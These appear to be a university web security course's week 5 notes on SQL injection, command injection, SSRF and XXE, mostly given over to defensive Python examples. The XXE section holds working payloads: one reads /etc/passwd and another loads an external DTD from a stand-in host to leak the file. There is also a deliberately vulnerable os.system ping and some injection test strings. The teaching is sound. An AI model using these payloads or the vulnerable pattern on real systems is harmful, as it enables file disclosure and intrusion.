Week 5

Good Faith Policy

“These courses expect a high standard of professionalism from their students with regard to how security testing is conducted. We expect all students to act in good faith at all times […]”

TL;DR Don’t be mean

https://sec.edu.au/good-faith-policy

Midsem Review

How did(n't) the midsem go?

  • Q1 - HTML - 100%
  • Q1 - Header - 71%
  • Q1 - Robots - 51%
  • Q2 (Parameter Fixing) - 98%
  • Q3 (Source Auditing) - 48%
  • Q4 (Information Leak) - 54%
  • Q5 - IDOR - 43%
  • Q5 - SQLi / IDOR - 2%
  • Q5 - SQLi (supersecret) - 0%
  • Bonus (Instructions) - 93%
  • Secret Flag (midsem0) - 1%

Bonus Marks

(redemption)


Topic 2 challenge walkthroughs
Cool things?

Recent News

Atlassian go brrr

  • CSP error in one of the subdomains

Topic 3 Challenges

More Injection

SQLI

  • ORDER BY
  • GROUP BY
  • DISTINCT
  • LIMIT
  • OFFSET
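
Worked example, added here and not taken from the course slides or any challenge: how the ORDER BY / LIMIT / OFFSET case differs from ordinary value injection. A column name or sort direction is an identifier, so it cannot be bound as a query parameter; the safe pattern is to map client input onto an allowlist of known columns. LIMIT and OFFSET are values and can be bound. The users table, the allowlist and the function names are constructed for this example (Python, sqlite3).

```python
import sqlite3

# Constructed in-memory table for the example (not from any real system).
SCHEMA = """
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, role TEXT);
INSERT INTO users VALUES (1, 'alice', 'admin'), (2, 'bob', 'user'), (3, 'carol', 'user');
"""

# Hypothetical allowlist. Identifiers can't be bound with '?', so the only safe
# way to let a client choose a sort column is to translate its input into one
# of a fixed set of column names that we wrote ourselves.
SORTABLE_COLUMNS = {"id": "id", "name": "username", "role": "role"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def list_users(conn, sort="id", direction="asc", limit=10, offset=0):
    """Return usernames sorted/paged by client-chosen parameters, safely."""
    try:
        column = SORTABLE_COLUMNS[sort]          # anything not in the map is rejected
        order = DIRECTIONS[str(direction).lower()]
    except KeyError:
        raise ValueError("unsupported sort column or direction")
    # LIMIT/OFFSET are values, so they are bound. int() fails on anything that
    # is not a plain integer, so no text from the client ever reaches the SQL.
    limit, offset = int(limit), int(offset)
    if not (1 <= limit <= 100) or offset < 0:
        raise ValueError("limit/offset out of range")
    # Only our own allowlisted strings are interpolated into the query text.
    sql = f"SELECT username FROM users ORDER BY {column} {order} LIMIT ? OFFSET ?"
    return [row[0] for row in conn.execute(sql, (limit, offset))]


def make_conn():
    """Fresh in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


if __name__ == "__main__":
    c = make_conn()
    print(list_users(c, sort="name", direction="desc"))
    for bad in ({"sort": "email"}, {"sort": "id, role"}, {"limit": "5 OFFSET 0 --"}):
        try:
            list_users(c, **bad)
        except ValueError as e:
            print("rejected", bad, "->", e)
```

The point to take away: parameter binding alone does not cover ORDER BY or GROUP BY, because the database engine needs the identifier before it can plan the query. Whenever a client is allowed to influence structure rather than values, the input has to be mapped, never concatenated.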

Command Injection / RCE

Properly handle user input!

  • Remote Shell
  • Web Shell
  • SSTI
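
Added example (not from the slides or any course challenge) of what "properly handle user input" means for a command that takes a user-supplied hostname: the shell-concatenation form is shown next to a hardened form that validates the hostname against a strict pattern and passes it as a separate argv element, so no shell ever interprets it. Function names and the hostname rule are assumptions made for this example.

```python
import os
import re
import subprocess

# Vulnerable form, kept only for comparison: the hostname is spliced into a
# shell command line, so every shell metacharacter in it is interpreted.
def ping_vulnerable(host):
    return os.system("ping -c 1 " + host)


# One DNS label: alphanumerics and hyphens, no leading/trailing hyphen, <= 63 chars.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"{LABEL}(?:\.{LABEL})*")


def build_ping_argv(host):
    """Validate `host` and return the argument vector for a ping, or raise ValueError."""
    # fullmatch (not match) so a trailing newline or anything after the name fails.
    if not host or len(host) > 253 or not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"not a valid hostname: {host!r}")
    # Each argument is its own list element. With shell=False (the default)
    # nothing here passes through /bin/sh, so ';', '&&', '|' or '$(...)' in
    # `host` would be just bytes in one argument. The pattern above also
    # rejects a leading '-', so the value can't be read as a ping option.
    return ["ping", "-c", "1", host]


def run_ping(host):
    """Run the ping and report whether the host answered (no shell involved)."""
    result = subprocess.run(build_ping_argv(host), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.returncode == 0


if __name__ == "__main__":
    print(build_ping_argv("example.com"))
    for bad in ("example.com;", "example.com && x", "-f", "a..b"):
        try:
            build_ping_argv(bad)
        except ValueError as e:
            print("rejected:", e)
```

Validation and argv-passing are two separate layers: the argv list removes the shell, and the pattern removes option injection and anything the downstream program should never see. Neither one alone is enough.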


Let’s have a look at WebCMS4 again

SSRF

Think back to HaaS

  • Only access to kb from haas
  • We could send network requests that appeared to originate from the haas server
  • Corporate / internal network?

Main Idea

Utilise the outbound connection of a device to access/gain more information

  • Information retrieval
  • Information disclosure - e.g. CSE login servers
  • Can lead to RCE
  • Server Side Includes

Make a server do something it’s not intended to

Mitigation

  • URL parsing is hard
  • Whitelist domains and IPs!
  • Lower the access control of services
  • Set limits! exec time, file sizes, recursion depth
  • Local devices should NOT be assumed to be safe
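
Added example (not the course's code) putting the mitigation list into a single outbound-URL check in Python: allowlist the scheme, host and port, resolve the host, and refuse to connect if the address is loopback, private, link-local or otherwise non-global, because a local device is not assumed safe. The allowlist, the hostnames and the addresses are constructed; the DNS lookup is a dictionary stand-in so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical policy for this service's outbound requests.
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}

# Constructed stand-in for DNS so the example runs offline. In a real service
# this is a resolver call, and the address it returns is the one you must
# connect to: resolving again later reopens the window for a rebinding answer.
FAKE_DNS = {
    "api.example.com": "1.2.3.4",        # constructed "public" address
    "cdn.example.com": "5.6.7.8",        # constructed "public" address
    "rebind.example.com": "10.0.0.5",    # a name that points into the LAN
}


def resolve(host):
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise ValueError(f"cannot resolve {host!r}")


def is_internal(ip):
    """True for any address a server should not be tricked into talking to."""
    addr = ipaddress.ip_address(ip)
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified
            or not addr.is_global)


def check_outbound_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return (ip, port) the request may go to, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:            # no file://, gopher://, ...
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    # .hostname strips userinfo and lowercases, so 'http://api.example.com@10.0.0.5/'
    # yields '10.0.0.5': always compare the real target, never the raw string.
    host = parts.hostname
    if host is None or host not in allowed_hosts:
        raise ValueError(f"host not in allowlist: {host!r}")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:                      # no 'http://api.example.com:8080/'
        raise ValueError(f"port not allowed: {port}")
    ip = resolve(host)
    if is_internal(ip):                                # allowlisted name, internal answer
        raise ValueError(f"{host} resolves to internal address {ip}")
    return ip, port


if __name__ == "__main__":
    print(check_outbound_url("https://api.example.com/v1/items"))
    for bad in ("file:///etc/passwd", "http://api.example.com@10.0.0.5/",
                "http://api.example.com:8080/", "http://localhost/"):
        try:
            check_outbound_url(bad)
        except ValueError as e:
            print("blocked:", e)
```

Two of the list items show up as design decisions here: "URL parsing is hard" is why the check works on the parsed hostname and port rather than on a substring of the URL, and "local devices should NOT be assumed to be safe" is why an allowlisted name is still rejected when it resolves to an internal address.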

XXE (XML External Entity)

swisskyrepo/PayloadsAllTheThings

  • DTD - Document Type Definition
  • Internal Entity: If an entity is declared within a DTD
    • Kinda like variables
  • External Entity: If an entity is declared outside a DTD
    • e.g. external resources, used as data feeds

e.g. Internal Entity

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY mystr "wowowo">
]>
<data>
  <item>&mystr;</item>
</data>

Output: wowowo

e.g. External Entity

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY number SYSTEM "http://randomNumberGenerator.com">
]>
<data>
  <item>&number;</item>
</data>

Output: 7

e.g. Parameterised Entities (declared with %, referenced as %name; and only usable inside the DTD)

<!DOCTYPE foo [
  <!ENTITY % string "woah" >
  <!ENTITY % result "Got me like: %string;" >
]>

%result; expands to: Got me like: woah
Exploit: LFI / SSI

Exploit the external entity to perform LFI / SSI

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY passwdFile SYSTEM "file:///etc/passwd">
]>
<data>
  <item>&passwdFile;</item>
</data>

Output:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

Exploit: Error-Based XXE

Document sent to the target (pulls in an attacker-hosted DTD):

<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://some.server/ext.dtd">
    %ext;
]>
<message></message>

ext.dtd (hosted at http://some.server; the file contents end up in the parser's error message):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % A "<!ENTITY &#x25; B SYSTEM 'file:///lol/%file;'>">
%A;
%B;
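
Added example for the whole XXE section (not from the slides, the challenges or PayloadsAllTheThings): a small Python loader that shows internal entities being expanded on a trusted document, and a hardened loader for untrusted input that refuses any document carrying a DOCTYPE. Without a DTD there can be no ENTITY declarations at all, so the file-read and error-based variants above have nothing to work with. The three documents are constructed; the function names are mine. The byte-level check assumes the input is ASCII-compatible (UTF-8), which is stated in a comment.

```python
import re
import xml.etree.ElementTree as ET

# Constructed inputs (not taken from any real system).
INTERNAL_ENTITY_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY mystr "wowowo">
]>
<data><item>&mystr;</item></data>"""

EXTERNAL_ENTITY_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY passwdFile SYSTEM "file:///etc/passwd">
]>
<data><item>&passwdFile;</item></data>"""

PLAIN_DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<data><item>hello</item></data>"""

# Assumption: input is UTF-8 (or another ASCII-compatible encoding), so the
# literal bytes '<!DOCTYPE' are what a DTD looks like on the wire.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def parse_trusted(xml_bytes):
    """Plain ElementTree parse: internal entities are expanded by the parser."""
    return ET.fromstring(xml_bytes)


def parse_untrusted(xml_bytes):
    """Parse XML from an untrusted source, refusing any document with a DTD.

    No DTD means no <!ENTITY ...> declarations, internal or external, so
    neither file disclosure (&passwdFile;) nor loading a remote ext.dtd
    through a parameter entity is possible.
    """
    if DOCTYPE_RE.search(xml_bytes):
        raise ValueError("DOCTYPE/DTD not allowed in untrusted XML")
    return ET.fromstring(xml_bytes)


def item_text(xml_bytes, trusted=False):
    """Convenience wrapper: the text of <item> under either loader."""
    root = parse_trusted(xml_bytes) if trusted else parse_untrusted(xml_bytes)
    return root.find("item").text


if __name__ == "__main__":
    print("trusted, internal entity:", item_text(INTERNAL_ENTITY_DOC, trusted=True))
    print("untrusted, plain doc:", item_text(PLAIN_DOC))
    for doc in (INTERNAL_ENTITY_DOC, EXTERNAL_ENTITY_DOC):
        try:
            item_text(doc)
        except ValueError as e:
            print("blocked:", e)
```

In production Python the usual choice is the defusedxml package, which hooks the parser instead of scanning bytes and so also covers documents in non-ASCII-compatible encodings; the loader here is a minimal stand-in that makes the rule visible: untrusted XML gets no DTD, full stop.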

Many more…

Deliverables

  • This topic’s challenges due next Monday 23:59pm
  • Report - Week 7

Enjoy your Week 6 break ~
